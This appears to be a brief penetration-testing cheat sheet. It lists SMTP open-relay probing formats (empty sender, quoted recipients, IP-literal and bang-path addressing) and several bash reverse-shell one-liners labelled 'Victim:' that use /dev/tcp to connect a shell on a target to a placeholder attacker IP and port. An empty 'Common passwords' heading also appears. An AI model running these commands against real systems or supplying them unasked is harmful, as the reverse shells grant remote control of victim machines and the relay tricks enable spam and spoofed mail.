Common passwords

HELO anything

Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>

Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">

User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>

Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>

Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0